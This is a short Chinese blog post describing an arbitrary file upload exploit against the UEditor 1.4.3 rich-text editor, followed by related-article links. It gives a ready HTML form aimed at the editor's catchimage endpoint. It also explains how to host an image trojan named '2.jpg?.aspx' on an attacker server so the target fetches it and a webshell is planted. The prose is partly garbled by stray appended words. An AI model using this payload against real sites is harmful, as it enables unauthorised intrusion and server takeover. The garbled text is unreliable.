UEditor 1.4.3 任意文件上传漏洞
今天测试一个项目,进到后台以后发现使用富文本web编辑器html
构造一个恶意的html文件,方便咱们传输数据过去: xxxx为攻击地址web
<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST"> <p>shell addr:<input type="text" name="source[]" /></p > <inputtype="submit" value="Submit" /> </form>
而后制做一个图片马,文件名改成2.jpg?.aspx上传至本身的服务器,经过构造的恶意html进行上传shell
个人被安全设备拦截了安全
看看别人成功的案例服务器
相关文章
- 1. 网站漏洞修复之UEditor漏洞 任意文件上传漏洞
- 2. UEditor编辑器任意文件上传漏洞分析
- 3. phpcms v9.6.0任意文件上传漏洞
- 4. Tomcat任意文件上传漏洞
- 5. 任意下载漏洞、任意文件上传漏洞和任意文件包含漏洞的学习记录
- 6. UEditor编辑器两个版本任意文件上传漏洞分析
- 7. ueditor编辑器asp.net版本任意上传漏洞处理
- 8. 【漏洞学习——文件上传】百度Ueditor Django版任意文件上传可Shell
- 9. 文件上传漏洞-上
- 10. 织梦dedecms后台文件任意上传漏洞
- 更多相关文章...
- • PHP 文件上传 - PHP教程
- • R XML 文件 - R 语言教程
- • Flink 数据传输及反压详解
- • Docker容器实战(七) - 容器眼光下的文件系统
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
